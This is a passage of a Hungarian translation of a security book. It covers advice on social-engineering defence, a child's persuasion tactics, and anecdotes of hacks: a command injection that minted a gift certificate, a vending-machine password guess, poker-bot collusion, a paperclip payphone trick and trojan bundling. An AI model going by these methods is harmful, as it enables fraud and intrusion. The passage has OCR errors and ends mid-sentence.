Dolgozzuk ki a személyazonosság és a jogosultság ellenőrzésére
szolgáló eljárásokat.
Minden cégnél ki kell dolgozni az alkalmazottaktól információt kérő
vagy őket utasító emberek személyazonosságának és jogosultságának
ellenőrzésére szolgáló eljárást. Az ellenőrzési eljárás szükségszerűen
minden helyzetben a kért információ vagy művelet bizalmassági
fokától függ. Mint sok más munkahelyi kérdés esetén, a biztonsági
igényeket is egyensúlyba kell hozni a szervezet üzleti igényeivel.
A képzésnek nem csak a nyilvánvaló technikákra, hanem az olyan
finomságokra is fel kell hívnia a figyelmet, mint amit Whurley
használt, amikor egy névjegykártyával teremtette meg hitelességét.
(Emlékezzünk az 1970-es években játszott The Rockford Files bűnügyi
sorozatra, amelyben a főszereplő, James Garner egy kis nyomdát tartott
a kocsijában, hogy mindig az alkalomnak megfelelő névjegykártyával
tudjon előállni.) A megtévesztés művészete című könyvben[2]
számtalan javaslat található az ellenőrzési eljárásra.
Vonjuk be a felsővezetést is!
Ez természetesen majdhogynem közhely: minden jelentős vezetői
törekvés annak felismerésével kezdődik, hogy a program sikeréhez
vezetői támogatásra van szükség. Valószínűleg kevés olyan céges
erőfeszítés van, ahol ez a támogatás fontosabb, mint a biztonság
esetében, amely napról napra egyre fontosabbá válik, mégsem hoz
további céges bevételeket, sőt gyakran anyagi terhet is ró a szervezetre.
Ez a tény mindenesetre csak fontosabbá teszi, hogy a biztonsági iránti
elkötelezettségnek felülről kell kiindulnia. A felsővezetés egy ehhez
kapcsolódó feljegyzésében két egyértelmű üzenetet kell hogy küldjön
az alkalmazottaknak. A vezetők soha nem fogják az alkalmazottakat
arra utasítani, hogy játsszák ki a biztonsági szabályzatot. És egyetlen
alkalmazott sem juthat bajba, ha a biztonsági rendszabályokat követi,
még akkor sem, ha egy vezető ennek az ellenkezőjére utasítja.

Egy könnyed kitérő: Ismerjük meg saját családunk manipulátorait


– gyerekeinket

Sok (vagy talán a legtöbb) gyerek – a social engineerekhez


hasonlóan – hihetetlen manipuláló képességekkel rendelkezik, amit a
legtöbb esetben elveszít, mire felnő és szocializáltabb lesz. Minden
szülő volt már a gyerek támadásának célpontja. Amikor egy kisgyerek
eléggé akar valamit, olyan mértékben képes hajthatatlanná válni, ami
ugyan rendkívül zavaró, de már-már szórakoztató is.
Akkoriban történt, amikor Bili Simon és jómagam e könyv végén
jártunk, hogy tanúja lettem egy gyermek nagyszabású social
engineering támadásának. Darci barátnőm és lánya, a kilencéves
Brainnah Dallasban csatlakoztak hozzám, aki üzleti úton jártam ott. Az
esti repülő indulása előtt a hotelben töltött utolsó nap Briannah azzal
tesztelte anyja türelmét, hogy követelte, hogy az általa kiválasztott
étterembe menjenek, és egy gyermekekre jellemző dühkitörést dobott
be. Darci azt az enyhe büntetést alkalmazta, hogy ideiglenesen elvette a
Gameboyát, és mondta neki, hogy– egy napig nem játszhat a játékkal.
Briannah egy időre belenyugodott ebbe, majd különböző módszerekkel
megpróbálta meggyőzni az anyját, hogy adja vissza a játékát, és még
akkor is ezen dolgozott, amikor visszatértem a szállodába, és
csatlakoztam hozzájuk. A gyerek állandó nyaggatása idegesítő volt;
később felismertük, hogy megpróbál social engineering támadást
bevetni ellenünk, így elkezdtünk jegyzetelni:
Unatkozom. Visszakaphatnám kérlek a játékomat? (Követelésként,
nem kérdésként hangzott.)
Megőrjítelek, ha nem játszhatok. (Nyafogással kísérve.)
A játékom nélkül semmit nem tudok csinálni a gépen. (Az „ezt
minden hülye tudja” hangnemében mondva.)
Jó lennék, ha csak egyetlen játékot játszhatnék, nem? (Kérdésnek
álcázott ígéret.)
Ha visszaadod a játékomat, jó leszek. (A komoly őszinteség
mélysége.)
Tegnap este jó voltam, miért nem játszhatok most? (Zavaros
érvelésre alapozott elkeseredett kísérlet.)
Nem teszem többet. (Szünet.) Most már játszhatok egyet? („Soha
többé nem teszi” – mennyire könnyen becsaphatónak hisz minket!)
Visszakaphatom most, kérlek (Ha az ígéretek nem működnek, talán
egy kis könyörgés majd segít...)
Holnap megint iskolába kell mennem, így nem tudom lejátszani a
játékot, ha most nem kezdem el. (OK, hány különböző formája van a
social engineeringnek? Lehet, hogy fel kellett volna venni
szerzőtársnak a könyvhöz.)
Sajnálom és hibáztam. Játszhatok egy kicsit? (A bevallás jót tehet a
léleknek, de manipuláló eszközként nem nagyon működik.)
Kevin mondta, hogy csináljam. (Azt hittem, csak hackerek mondták
ezt!)
Nagyon szomorú vagyok a játékom nélkül. (Ha semmi más nem
megy, próbálkozzunk egy kis együttérzéssel.)
Már több mint fél napja a játékom nélkül vagyok. (Más szavakkal:
„Mennyi szenvedés lesz már elég?”)
Nem kerül pénzbe, ha játszom. (Elkeseredett kísérlet annak
kiderítésére, hogy az anyja milyen okból szabott ki ilyen hosszú
büntetést. Rossz tipp.)
Ez az én születésnapi hétvégém, és nem játszhatok a játékommal.
(Újabb szánalmas próbálkozás részvét kicsikarására.)
És így tovább, miközben a repülőtérre készülődtünk:
Unatkozni fogok a repülőtéren. (Azzal a halvány reménnyel, hogy az
unalom olyan félelmetes dolog, amit mindenáron el kell kerülni. Talán
ha Briannah eléggé unatkozna, elkezdene rajzolni vagy olvasni.)
Három óra az út, és semmit nem tudok csinálni! (Még mindig van rá
remény, hogy megtörik, és kinyitja a magával hozott könyvét.)
Túl sötét olvasni vagy rajzolni. Ha játszom, látom a kijelzőt. (A
halvány reménysugár logikája.)
Használhatnám legalább az Internetet? (Kell, hogy legyen
kompromisszum.)
Te vagy a világ legjobb anyukája! (Bókokat és kedvességeket is
mond, remélve, hogy megkapja, amit akar.)
Ez nem tisztességes!!! (Az utolsó kétségbeesett próbálkozás.)
Ha szeretnénk jobban megérteni, hogyan manipulálják a social
engineerek a célpontjaikat és hogyan kényszerítik őket a gondolkodó
állapotból az érzelmi állapotba... figyeljük egy kicsit a gyerekeinket!

ZÁRÓJELBEN

Első közös könyveinkben Bili Simon és jómagam az


„információbiztonság leggyengébb láncszemének” neveztük a social
engineeringet.
Mit látunk három évvel később? Azt, hogy a cégek biztonsági
technológiákat vesznek igénybe számítógépes erőforrásaik hackerek
vagy felbérelt ipari kémek által végrehajtandó műszaki támadások
elleni védelmére, illetve hatékony fizikai biztonsági intézkedéseket
tartanak fenn a jogosulatlan bejutás megakadályozására.
De azt is látni kell, hogy kevés figyelmet fordítanak a social
engineerek által jelentett veszélyekre. Rendkívül fontos tájékoztatni az
alkalmazottakat erről a veszélyről, és kiképezni őket arra, hogyan
kerülhetik el a becsapást és azt, hogy akaratlanul is a támadó segítőivé
váljanak. Az emberi tényező sebezhetősége elleni védekezés komoly
kihívást jelent. A social engineering taktikát használó hackerek elleni
védekezésért minden egyes alkalmazott felelős – minden alkalmazott,
azok is, akik napi munkavégzésük során nem is használnak
számítógépet. A vezetők sebezhetők, az ügyfélszolgálati munkatársak
sebezhetők, a telefonkezelők, a recepciósok, a takarítók, a parkolóőr és
főként az új alkalmazottak – a social engineer mindegyiküket
kihasználhatja a tisztességtelen céljai eléréshez vezető út egy-egy
lépcsőjeként.
Minden korban az emberi tényező bizonyult az információbiztonság
leggyengébb láncszemének. És az egymillió dolláros kérdés: Ön lesz az
a leggyengébb láncszem, akit a social engineer ki tud majd
kihasználni?

JEGYZETEK

1. Nediert pszichológus megjegyzése az alábbi címen érhető el


www.chapnnon.edu/comm/comm/faculty/thobbs/com401/socialinfluen
ce/minclfl.hinnl.
2. Lásd Kevin D. Mitnick és William L. Simon: A megtévesztés
művészete Perfact-Pro, 2003, 270 275. oldal

11. fejezet

Egypercesek
Nem vagyok titkosírás-szakértő, sem matematikus. Csak azt tudom,
hogy az emberek hibákat követnek el az alkalmazásokban, és ráadásul
ugyan-azokat a hibákat követik el újra és újra.
Hackerből lett biztonsági tanácsadó
A könyv írása során több olyan történetet meséltek el nekünk,
amelyek jellegükből adódóan nem illettek az előző fejezetekbe,
azonban túl szórakoztatóak ahhoz, hogy kihagyjuk őket. Nem
mindegyik a hackelésről szól. Némelyik csupán csintalanságról, esetleg
mások manipulálásáról, és vannak olyanok, amelyeket azért érdemes
elolvasni, mert rávilágítnak az emberei természet bizonyos
jellemzőire... vagy egyszerűen csak szórakoztatóak.
Mi élvezettel hallgattuk őket, és azt gondoltuk, talán az olvasóknak
is tetszenek majd.

A HIÁNYZÓ FIZETÉSI CSEKK

Jim az amerikai hadseregben volt őrmester, és a Washington


állambeli Puget Soundban található Fort Lewis számítógépes
csoportjában dolgozott egy zsarnokként viselkedő törzsőrmester
beosztottjaként, aki – Jim elmondása szerint – „az egész világgal
haragban volt”, aki „beosztását arra használta, hogy a rangban alatta
levők életét tönkretegye”. Jim és a csoportban levő haverjai végül
megelégelték a dolgot, és elhatározták, hogy valamilyen módon
megbüntetik ezt a vadállatot, amiért oly elviselhetetlenné teszi az
életüket.
Az egységük kezelte a személyzeti feljegyzéseket és a bérszámfejtési
adatokat. A pontosság érdekében két különböző tisztviselő vitte be a
fizetési tételeket, mindent kétszer rögzítettek, és mielőtt az adatokat
elküldték volna a személyi rekordokba, mindig összehasonlították a két
rögzítés eredményét.
A fiúk által kiagyalt bosszú elég egyszerű volt, mondja Jim. Mindkét
katona azt vitte be a számítógépbe, hogy a törzsőrmester meghalt.
Ez természetesen azt eredményezte, hogy nem kapott fizetést.
Eljött a fizetésnap, és a törzsőrmester panaszkodott, hogy nem kapta
meg a csekkjét. – Az előírás szerint elő kellett volna venni a tiszt
kartotékját, és kézzel kiállítani a fizetési csekkjét. – Azonban ez a
megoldás sem működött. – Valamilyen ismeretlen ok miatt – mondta
Jim somolyogva sehol nem találtuk az aktáit. Jó okom volt azt hinni,
hogy a papírok váratlanul elégtek.– Nem nehéz kitalálni, Jim miért
gondolhatta ezt.
Mivel a számítógép azt mutatta, hogy a férfi meghalt, és semmilyen
papír alapú feljegyzés nem volt arról, hogy valaha is létezett, a
törzsőrmester ördögi körbe került. Semmilyen előírás nem létezett arra
vonatkozóan, hogy egy nem létező embernek hogyan lehet fizetési
csekket kiállítani. Kérvényezni kellett a hadsereg főparancsnokságánál,
hogy másolják le és továbbítsák a tiszt aktájában található
dokumentumokat, és utasítást kellett kérni arra vonatkozóan, hogy
időközben folyósítható-e számára a pénz. A kéréseket annak rendje és
módja szerint elküldték, de gyors válaszra nem nagyon lehetett
számítani.
Minden jó, ha a vége jó. Jim arról számolt be, hogy „kapcsolatunk
hátra levő időszakára teljesen megváltozott a viselkedése”.

GYERE HOLLYWOODBA, TE VARÁZSLÓ TINÉDZSER

Amikor kijött a Jurassic Park 2 film, egy fiatal hacker, nevezzük


Yukinak, elhatározta, hogy saját irányítása alá vonja a MCA/Universal
Stúdiós honlapját, amely a lost-world.com, a Jurassic Park filmjének
és a stúdió tv-show-inak weboldalát hostolta.
Azt mondja, hogy „elég triviális hackelés” volt, annyira gyengén
védték az oldalt. Olyan módszert alkalmaztak amelyet – technikai
kifejezések tömkelegét használva – így írt le: – Egy bouncert futtató
CGI-t szúrtam be, amely egy tűzfallal nem védett magasabb porton
tette lehetővé a kapcsolatot. így a teljes hozzáférés érdekében a
magasabb porton csatlakozni tudtam a helyi géphez.
Az MCA akkoriban egy vadonatúj épületben volt. Egy kis internetes
kutatás után Yuki kiderítette az épületet építő cég nevét, meglátogatta a
weboldalát, és könnyedén feltörte a hálózatát. (Ez elég régen volt. a
magától értetődő sebezhetőségeket mára már valószínűleg kijavították.)
Amint a tűzfalon belül volt, rövid idő alatt megtalálta az MCA
épületének AutoCAD-es tervrajzait. Yuki fel volt dobva. Ez azonban
valódi céljának csupán egy kis oldalága volt. Barátja buzgón dolgozott
a Jurassic Park weboldalának „egy csinos új lógóján”, amelyet a
Jurassic Park név és a nyitott állkapcsú tyrannosaurus helyére
szándékoztak felrakni. Feltörték a weboldalt, az eredeti lógó helyére
feltették a sajátjukat (lásd a 11-1. ábrán), majd hátradőlve várták, hogy
mi történik.
11-1. ábra: A Jurassic Park logója helyett felrakott logó.
A reakció nem egészen az volt, amit vártak. A média viccesnek, de
egyúttal gyanúsnak találta a lógót. A CNet News.com azzal a
szalagcímmel hozta le a sztorit hogy akkor ez most hack vagy hoax
(átverés), mert azt gyanították, hogy a feltörést az Universal rendezte
meg azzal a céllal, hogy további érdeklődést biztosítsanak a filmnek.
Yuki elmondta, hogy nem sokkal ezután kapcsolatba lépett a
Universallal, elmagyarázta nekik, hogy milyen résen keresztül
szereztek hozzáférést az oldalhoz, illetve tájékoztatta őket az általuk
telepített hátsó ajtóról. A weboldaluk vagy hálózatuk feltöréséről
tudomást szerző sok egyéb szervezettel ellentétben a Universalos
fickók igenis értékelték az információt.
Sőt, ahogy Yuki elmesélte, még egy állást is felajánlottak számára –
gondolván, hogy hasznos lehet a további sebezhetőségek felderítésében
és kijavításában. Yukit izgalomba hozta az ajánlat.
Végül mégsem lett semmi a dologból. – Amikor megtudták, hogy
csak 16 éves vagyok, nevetségesen kis összegért akartak felvenni. – Így
elutasította az ajánlatot.
Két évvel később a CNet News.com egy listát jelentetett meg a
számukra legkedvesebb 10 hackelésről. Yuki örömmel látta, hogy a
Jurassic Pond hack is köztük van.
A hackelős napok azonban véget értek, mondja Yuki. – Már öt éve
kikerültem a körből. – Miután elutasította az MCA ajánlatát, tanácsadói
karriert kezdett, és ezt űzi mind a mai napig.

AZ ÜDÍTŐAUTÓMATAMEGHACKELÉSE

Néhány évvel ezelőtt a Xerox és más társaságok is olyan gépekkel


kísérleteztek, amelyekbe beépítik az „E.T. hazatelefonál” funkciót. Egy
fénymásológép például figyelemmel kíséri saját állapotát, és amikor a
toner fogytán van vagy az etetőgörgők elkoptak vagy a gép bármilyen
más problémát észlel, jelzést küld egy távoli állomásnak vagy a céges
központnak, és jelenti a szituációt. Ezt követően a központból
kiküldenek egy szerelőt, aki az információ birtokában minden
szükséges alkatrészt magához vesz.
Informátorunk, David szerint a módszerrel kísérletező egyik cég a
Coca-Cola volt. Kísérleti kólaautomatákat kötöttek egy Unix
rendszerre, és távolról kértek le jelentéseket a gépek pillanatnyi
állapotáról.
Egy nap, amikor David és barátai halálra unták magukat,
elhatározták, hogy kipróbálják a rendszert, és megnézik, mit tudnak
kideríteni. Ahogy várták, a gépekhez telneten keresztül hozzá tudtak
férni. – Soros porton keresztül voltak csatlakoztatva, és egy olyan
folyamat futott rajtuk, amely begyűjtötte a gép állapotához kapcsolódó
adatokat, majd szépen formázta őket A Finger programot használták,
amely megmutatta a bejelentkezett felhasználó nevét – már csak a
jelszót kellett kitalálniuk”.
Mindössze három kísérletre volt szükségük a jelszó kiderítéséhez,
noha a cég programozói egy igen valószínűtlen jelszót választottak.
Miután hozzáférést szereztek, felfedezték, hogy a program forráskódját
a gépben tárolták, és „nem tudtunk ellenállni a kísértésnek, hogy ne
nyúljunk kicsit bele”!
Beszúrtak egy kódrészletet, amely minden ötödik kimenő üzenethez
hozzáadott egy sort: „Segítség! Valaki rugdos!”
– Legnagyobbat mégis akkor nevettünk – mondja David –, amikor
kitaláltuk a jelszót. – Van kedvük tippelni, hogy mi volt az a jelszó,
amiről a Coca Colá-s emberek azt hitték, hogy senki nem fogja
kitalálni? David elmondása szerint a Coca Cola üdítőautomatájának a
„pepsi” volt jelszava!

AZ IRAKI HADSEREG MEGBÉNÍTÁSA A SIVATAGI


VIHARBAN

A Sivatagi Vihar hadművelet előkészítő szakaszában az amerikai


hadsereg hírszerzése elkezdett az iraki hadsereg kommunikációs
rendszerei után kutatni. Rádiófrekvenciát érzékelő műszerekkel
megpakolt helikoptereket küldtek „az iraki határ biztonságos oldala”
mentén levő stratégiai helyszínekre. E sokat mondó kifejezést Mike
használta, aki személyesen ott volt.
A helikoptereket hármas csoportokban küldték ki. A hajszálpontos
helymeghatározó rendszerek (GPS) kifejlesztése előtt a hírszerzők a
három helikopter által küldött keresztbemérésekből tudták
meghatározni az iraki hadsereg egységeinek pozícióját, illetve az
általuk használt rádiófrekvenciákat.
A hadművelet megkezdése után az amerikaiaknak sikerült
lehallgatniuk az irakiak kommunikációját. Mike elmondta; – Fárszi
nyelvet beszélő amerikai katonák elkezdték lehallgatni az iraki
parancsnokokat, ahogy azok a földi járőrökkel beszéltek. – Ráadásul
nem csak hallgatták a beszélgetést. Amikor egy parancsnok arra
utasította egységeit, hogy mindenki egyszerre lépjen be a kapcsolatba,
az egységek a következő szöveggel jelentkeztek be: „Itt Teve 1.” „Itt
Teve 3.” „Itt Teve 5.” Ekkor a lehallgatást folytató egyik amerikai
katona bemondta a rádióba fárszi nyelven; „itt Teve 1”, megismételve a
bejelentkezési nevet.
A megzavarodott iraki parancsnok ekkor azt mondta a Teve 1-nek,
hogy már bejelentkezett, ne tegye ezt kétszer. A Teve 1 erre ártatlanul
azt felelte, hogy ő csak egyszer jelentkezett be. – Egy csomó ideig
ment a vita arról, hogy ki mit mondott és ki mit nem – idézi fel Mike.
Az amerikai hadsereg lehallgatói ugyanezzel a módszerrel
idegesítették a határ menti iraki parancsnokokat. Egy idő után
elhatározták, hogy szórakozásukat eggyel magasabb szintre emelik. A
bejelentkezési név helyett egy amerikai hang a következőt kiáltotta
angolul: „Ez a Bravo Force 5 – hogy vagytok?” Mike szerint mindig
óriási felhördülés volt a válasz.
Ezek a közjátékok megőrjítették a parancsnokokat, akik minden
bizonnyal megszégyenültek saját járőreik előtt a hitetlen hódítók
gúnyolódásai miatt, és akik ugyanekkor kénytelenek voltak rájönni
arra, hogy nem tudnak a rádióikon keresztül úgy kiadni parancsot az
egységeiknek, hogy az amerikai hadsereg le ne hallgassa. Természetes
válaszlépésként elkezdték a tartalékfrekvenciákat használni.
Az amerikai hadsereg helikoptereinek a fedélzetén levő
rádiófrekvencia-érzékelő berendezések úgy voltak kialakítva, hogy
képesek legyenek kezelni az ilyen ellenlépést. A műszerek egyszerűen
letapogatták a teljes rádiósávot, és rövid időn belül megtalálták azt a
frekvenciát, amelyre az irakiak váltottak. Az amerikai lehallgatók
hamarosan ismét nyomon voltak. Ráadásul a hírszerzés minden
váltáskor egy újabb frekvenciát adott az irakiak által használt
frekvenciák egyre növekvő listájához. És egyre folytatták az iraki
védősereg „harcrendjére” vonatkozó információk – a hadsereg mérete,
elhelyezkedése, az egységek megnevezései, sőt akcióterveik –
gyűjtését és pontosítását.
Végül az iraki parancsnokok a csapataikkal való kapcsolattartás
során felhagytak a rádiókommunikációval, és helyette a telefon
földkábeleit használták. Az amerikaiak megint ott voltak a nyomukban.
Az iraki hadsereg az ősrégi, alapszintű soros telefonvonalakra
támaszkodhatott, így kódolt jeladóval gyerekjáték volt lehallgatni a
vonalak bármelyikét, és a telefonforgalmat a hírszerzésnek továbbítani.
Az amerikai hadsereg fárszi nyelvet beszélő katonái ismét munkához
láttak, a rádiókommunikáció megzavarásához használt korábbi
módszereket használva ehhez. Vicces elképzelni az iraki őrnagyok,
ezredesek vagy akár tábornokok arcán megjelenő kifejezést, amikor a
kedélyes hang felbúg a vonalban, mondván: „Hello, itt ismét a Bravo
Force 5. Hogy vagytok?”
És talán még hozzátettek valami ilyet: – Nagyon hiányoztatok, jó
volt ide visszatérni.
Ennél a pontnál már semmilyen további modern kommunikációs
eszköz nem állt az iraki parancsnokok rendelkezésére. Visszatértek a
parancsok kézzel történő megírásának módszeréhez, majd a papír alapú
üzeneteket teherautókkal küldték ki a harctéren levő parancsnokokhoz,
akik megírták válaszukat, majd a forró, homokos sivatagon keresztül
visszaküldték a parancsnokságra. Egy egyszerű kérdés és válasz akár
órákig tartott. A több egység együttműködését igénylő parancsok
majdnem teljesen kivitelezhetetlenné váltak, mivel annyira nehézkes
volt időben utasítani a terepen levő, az akcióban érintett egységeket.
Nem a leghatékonyabb módszere a gyorsan mozgó amerikai
haderővel szembeni védekezésnek.
Amint elkezdődött a légi háború, az amerikai pilóták egy része azt a
feladatot kapta, hogy az iraki harctéri csoportok ismert tartózkodási
pontjai között az üzeneteket továbbító teherautók után kutassanak. A
légierő elkezdte ezeket a kommunikációs gépjárműveket célba venni,
és kivonni őket a forgalomból. Néhány napon belül az iraki sofőrök
nem voltak hajlandóak az üzenetek továbbítására, mivel tisztában
voltak vele, hogy a feladat biztos halált jelent.
Ez az iraki irányító és végrehajtó rendszer majdnem teljes mértékű
leállását eredményezte. Az iraki központi parancsnokság ugyan képes
volt eljuttatni utasításait a harctérre, a harctéri parancsnokok, meséli
Mike, „féltek a kommunikációnak ettől a formájától, mivel tudták,
hogy az üzeneteket lehallgatja az amerikai hadsereg, és arra használják
az információkat, hogy támadást indítsanak ellenük” – különösen az
után, hogy a parancsokra adott válaszaival a harctéri parancsnok
elárulta, hogy még mindig életben van, és számíthatott arra, hogy a
válaszai lehetővé teszik az amerikaiak számára, hogy pontosan
meghatározzák a helyzetét. Azon igyekezetükben, hogy mentsék saját
életüket, egyes iraki egységek egyszerűen kikapcsolták a megmaradt
kommunikációs eszközeiket is, így nem jutott el hozzájuk a bejövő
kommunikáció sem.
– Rövid időn belül – emlékszik vissza Mike szemmel látható
jókedvvel – az iraki hadsereg káoszba és tétlenségbe süllyedt, mivel
sok helyen senki sem tudott – vagy nem volt hajlandó – kommunikálni.

A MILLIÁRD DOLLÁROS AJÁNDÉKUTALVÁNY

A következő történet legnagyobb részét közvetlenül az ezzel a volt


hackerrel folytatott beszélgetésből vettük. A férfi jelenleg egy jól
szituáit, elismert biztonsági szakértő.
Ennyi az egész, haver, ennyi az egész. „Miért rabol ki bankokat, Mr
Horton?” „Mert ott van a pénz.”
Elmesélek egy vicces történetet. Nekem és ennek a Frank fiúnak a
Nemzetbiztonsági Intézettől – inkább nem mondom a nevét, most a
Microsoftnál dolgozik. [Behatolási tesztre szóló] megbízásunk volt egy
digitális ajándékutalványokat készítőcégtől. Már nem működnek ugyan,
de inkább nem nevezem őket a nevükön.
Szóval mit fogunk meghackelni? Hackeljük meg az
ajándékutalványokban levőtitkosítást? Nem, [a titkosítás] félelmetes
volt, nagyon jól megcsinálták. Ha a titkosítás oldaláról biztos a dolog,
időpazarlás lenne próbálkozni. De akkor mit támadjunk meg?
Megnézzük, hogy egy kereskedőhogyan vált be egy utalványt. Ez
belsős támadás, mert adtak nekünk egy kereskedői accountot. Nos,
találtunk egy hibát a beváltási rendszerben, egy alkalmazási hiba miatt
tetszőleges parancsot futtathatunk egy űrlapból. Ostoba volt, gyerekes,
semmilyen különleges tudásra nem volt szükség – csak tudni kellett,
hogy mit keress. Nem vagyok titkosírás-szakértő, sem matematikus.
Csak azt tudom, hogy az emberek hibákat követnek el az
alkalmazásokban, és ráadásul ugyanazokat a hibákat követik el újra és
újra.
A beváltó központtal azonos hálózaton volt egy kapcsolat a
„pénzverdéjükhöz” – az ajándékutalványt készítőgéphez. Ennek
használatával betörtünk a gépbe. Ahelyett, hogy rendszergazdai
jogosultságot szereztünk volna, készítettünk egy ajándékutalványt,
amelyen a megengedett legnagyobb értéket választottuk, és amerikai
dollárra állítottuk a pénzegységet.
Most van egy 1 900 000 000 dollárt érőajándékutalványom. És az
utalvány teljesen érvényes. Valaki azt mondta, hogy angol fontra kellett
volna állítanunk, mert akkor még többet érne.
Felmentünk a Gap weboldalára, és vettünk egy pár zokni.
Elméletileg egy milliárd kilencszázmilliót kellett volna visszakapnunk a
zokniból. Félelmetes volt.
A behatolási teszt jelentéséhez akartam mellékelni a zoknit.
De ezzel még nem fejezte be. Nem tetszett neki az, ahogy a történet
elhangzott, és folytatta, abban a reményben, hogy sikerül kicsit
javítania a róla kialakult képen.
Lehet, hogy úgy néztek rám, mint egy rocksztárra, de ti csak azt az
utat látjátok, amit bejártam, és azt mondhatjátok: „Óh, Istenem, nézd,
milyen okos. Ezzel meg ezzel bejutott egy űrlapba, ott megszegett egy
bizalmi kapcsolatot, hirtelen a pénzverdébe jutott, és csinált magának
egy ajándékutalványt.” Igen, de tudjátok igazából, hogy ez milyen
nehéz volt? Úgy ment, hogy „nos, próbáld meg ezt, működik?” Nem
működött. „Próbáld meg azt, működik?” Az sem működött.
Próbálgattunk. Kíváncsiság, állhatatosság és vakszerencse. És egy
icipici kis tudás.
Még ma is megvan az a zokni.

A TEXAS HOLD’EM HACKELÉS

Az egyik dolog, amiben a pókerjátékosok szinte biztosak lehetnek,


amikor egy nagy kaszinóban asztalhoz ülnek – akár a napjainkban
legnépszerűbb, Texas Hold'Em változatot, akár valamelyik másikat
játsszák az, hogy az osztó, a teremfelügyelő és a mindent látó
videokamerák figyelő szemei előtt csak saját tudásukra és
szerencséjükre számíthatnak, és nem nagyon kell azon aggódniuk,
hogy a többi játékos esetleg csalhat.
Az Internetnek köszönhetően manapság azt is megtehetjük, hogy
elektronikusan ülünk le egy pókerasztalhoz – saját számítógépünk
mellől játszhatunk a pénzért az ország és a világ különböző részein a
saját számítógépük előtt ülő más játékosok ellen.
És ekkor jön egy hacker, aki rájön, hogy milyen módon adhat
magának nem is olyan kis előnyt egy házilag készített, jelen esetben
elektronikus robot használatával. Ron, a hacker elmondja: ez azt
jelentette, hogy „írtam egy olyan robotot, amely 'matematikailag
tökéletes' pókert játszott, miközben az ellenfelekkel elhitette, hogy egy
igazi ember ellen játszanak”. Azon túlmenően, hogy a mindennapi
játékok során pénzt nyert vele, a robotját számos tornára benevezte, és
az nem is kevés sikert ért el azokon. „Egy négyórás, nevezési díj
nélküli versenyen, ahol háromszáz játékos indult, a robot a második
helyen végzett.”
A dolgok remekül mentek mindaddig, amíg Ron el nem követett egy
komoly hibát: úgy döntött, hogy eladja a robotot; 99 dollárért bárki
megvehette egy évre. A termékről tudomást szerző emberek és az
online pókeroldalakat látogató, Ron által célba vett felhasználók
elkezdtek azon aggódni, hogy robotjátékosok ellen játszanak. – Ez az
emberek oly mértékű felháborodását (és a kaszinó vezetőinek az
ügyfeleik elvesztése miatti olyan komoly aggodalmát) váltotta ki, hogy
az oldal üzemeltetői a robotom használatát észlelő kódot adtak az
oldalhoz, és azt mondták, hogy örökre eltiltják azt, akit a használatán
kapnak.
Ideje volt stratégiát váltani.
Miután sikertelenül próbáltam meg üzletet csinálni magából a robot-
technológiából, úgy döntöttem, hogy az egész projektet illegalitásba
viszem. Úgy módosítottam a robotot, hogy az egyik legnagyobb online
pókeroldalon játsszon, és kiterjesztettem a technológiát, hogy „csapat
módban’ tudjak játszani, amelynek során az ugyanannál az asztalnál
ülőkét vagy több robot a jogosulatlan előny érdekében felfedte
egymásnak a kártyáját.
A kalandját bemutató eredeti e-mailben Ron utalt rá, hogy robotjai
még ma is használatban vannak. Később ismét írt nekünk, és azt kérte,
hogy mondjuk el a következőket:
Miután mérlegelte, hogy milyen pénzügyi károkat tud okozni az
online pókerjátékosok ezreinek, Ron végül úgy döntött, hogy soha többé
nem használja ellenük a technológiáját.
Online szerencsejátékosok, a döntés a ti kezetekben van. Ha Ron
meg tudta csinálni, mások is meg tudják. Lehet, hogy jobban jártok, ha
inkább egy Las Vegas-ba tartó repülőre pattantok.

A TIZENÉVES PEDOFILÜLDÖZÖ

Társszerzőmmel ellenállhatatlannak találtuk ezt a történetet. Annak


ellenére, hogy talán csak részben igaz vagy esetleg teljes egészében
kitaláció, úgy döntöttünk, hogy minden lényegi változtatás nélkül
közreadjuk:
Az egész úgy tizenötéves koromban kezdődött. Egy barátom, Adam
megmutatta nekem, hogyan lehet ingyenes hívásokat indítani az iskolai
nyilvános telefonról, amely az ebédlőkülsőfalán volt. Ez volt életemben
az elsőalkalom, hogy akár kicsit is illegális dolgot csináltam. Adam egy
gemkapocsból csinált ingyenes telefonkártyát, azzal, hogy a
gemkapoccsal kilyukasztotta a kagyló fülhöz szorítandó részét. Amikor
a hívni kívánt számot tárcsázta, lenyomva tartotta a szám utolsó
számjegyét, és közben a kagyló beszélőrészéhez érintette a gemkapcsot.
Egy csomó kattanás hallatszott, majd kicsöngött a szám. Hihetetlen
volt. Életemben először találkoztam azzal, hogy milyen hatalom lehet a
tudás.
Azonnal elkezdtem olvasni mindent, amihez csak hozzáfértem. Ha
valami homályos dologról volt információ, azonnal meg kellett
szereznem. A gemkapcsos trükköt középiskolai éveim alatt végig
alkalmaztam, s közben egyre nőtt a sötétebb utak utáni vágyjam. Talán
az egész csak arról szólt, hogy lássam, meddig vezet ez az újonnan
felfedezett ösvény. Ha ehhez még hozzávesszük a valami „rossz”
elkövetésének izgalmát, együtt bőven elegendőahhoz, hogy egy 15 éves
punkot rossz útra vezessen.
Ezt követően jött a felismerés, hogy a hackerséghez a tudásnál több
kell. A csapdák végrehajtásához némi ravaszságra is szert kellett
tennem.
Egy online barátomtól hallottam ezekről a Trójainak nevezett
programokról, aki feltöltött nekem egyet a számítógépemre. A srác
hihetetlen dolgokat művelt vele, látta például, hogy éppen mit gépelek,
rögzíteni tudta a videokamerám által mutatott képeket, és sok egyéb
vicces dolgot tudott csinálni. A mennyországban éreztem magam.
Mindent, amit csak tudtam, kiderítettem erről a Trójairól, és ettől
kezdve a népszerű futtatható állományok mellé mindig becsomagoltam
azt. Csevegőszobákba mentem, és megpróbáltam rávenni valakit, hogy
töltse le ezek valamelyiket, de a bizalom fontos volt. Senki nem bízott
meg bennem, és erre jó okuk volt.
Egyszer véletlenül egy tinédzser IRC csevegőszobába mentem, és ott
találtam őt: egy pedofil jött be, aki fiatal kölykök és tizenévesek képei
után kutatott. Először azt hittem, hogy ez csak vicc, de úgy döntöttem,
hogy végigjátszom, és megnézem, hogy tudok-e a fickóból áldozatot
csinálni.
Elkezdtem vele magánban csevegni, olyan fiatal lánynak kiadva
magam, akinek minden vágya, hogy találkozzon vele – azonban nem
úgy, ahogy ő gondolja. Ez az úriember finoman fogalmazva is beteg
volt. A tizenöt éves ösztöneim igazságot akartak szolgáltatni. Úgy le
akartam égetni ezt a fickót, hogy kétszer meggondolja, mielőtt újból
gyerekre vadászik. Többször megpróbáltam neki elkiXldeni a Trójait,
